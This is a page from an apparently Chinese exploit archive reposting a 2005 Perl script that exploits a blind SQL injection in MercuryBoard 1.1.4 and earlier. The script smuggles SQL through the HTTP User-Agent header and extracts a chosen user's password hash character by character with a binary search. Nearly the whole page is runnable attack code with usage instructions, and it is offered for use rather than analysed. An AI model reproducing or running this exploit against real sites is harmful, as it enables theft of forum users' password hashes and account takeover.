首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MercuryBoard <= 1.1.4 User-Agent Remote SQL Injection Exploit
来源:http://rst.void.ru 作者:1dt.w0lf 发布时间:2005-06-22  

MercuryBoard <= 1.1.4 "User-Agent" Remote SQL Injection Exploit

#!/usr/bin/perl

### MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### * note: you need first register on forum for get id and login
### after what logout from forum and run exploit
### * note2: edit timestamp in sources if exploit not work ;)
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### (c)oded by 1dt.w0lf
### RST/GHC - http://rst.void.ru , http://ghc.ru
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;
use Getopt::Std;

getopts('h:f:b:i:l:p:');

$server = $opt_h;
$path = $opt_f;
$member_id = $opt_b;
$hacker_id = $opt_i;
$hacker_l = $opt_l;
$prefix = $opt_p || 'mb_' ;

if(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] SERVER : $server\r\n";
print " [~] FORUM PATH : $path\r\n";
print " [~] ID FOR BRUTE : $member_id\r\n";
print " [~] HACKER ID : $hacker_id\r\n";
print " [~] HACKER LOGIN : $hacker_l\r\n";
print " [~] TABLE PREFIX : $prefix\r\n\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

-------------------------------------------------------------------
USER ID : $member_id
HASH : $allchar
-------------------------------------------------------------------
};
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];

$user_agent2 = "666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii(substring((
SELECT/**/user_password/**/FROM/**/${prefix}users/**/WHERE/**/user_id=
$member_id),$s_num,1)))$ccheck,1119336207,0)), '666.666.666.666', '666', '666')/*";

$sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock2 ("GET %s?a=active HTTP/1.0\nHost: %s\nUser-Agent: %s\nAccept:
*/*\nConnection: close\n\n",
$request,$server,$user_agent2);

while(<$sock2>)
{
#print $_;
if (/w=$hacker_id"\>$hacker_l/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
&head;
print q(
USAGE
r57mercury.pl [OPTIONS]

OPTIONS
-h [host] ~ host where mercury board installed
-f [/folder/] ~ folder where mercury board installed
-b [user_id] ~ user id for bruteforce
-i [id] ~ hacker id (hacker must be register on forum)
-l [login] ~ hacker login on forum
-p [prefix] ~ database tables prefix (optional)
default is "mb"
E.G.
r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer
-------------------------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}
sub head()
{
print q(
-------------------------------------------------------------------
MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
-------------------------------------------------------------------
);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Claroline E-Learning Applicati
·Buffer Overflow In Ethereal (C
·Mambo Remote Password Hash Ret
·Mysql 4.x CREATE FUNCTION Arbi
·MacOS X launchd Race Condition
·Mysql 4.x CREATE FUNCTION libc
·Ipswitch IMail IMAP Buffer Ove
·Ethereal IAPP Remote Buffer Ov
·Invision Power Board SQL Injec
·PaX VMA Mirroring Unmapping Vu
·WebHints Remote Command Execut
·phpBB User id Auth. Bypass and
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved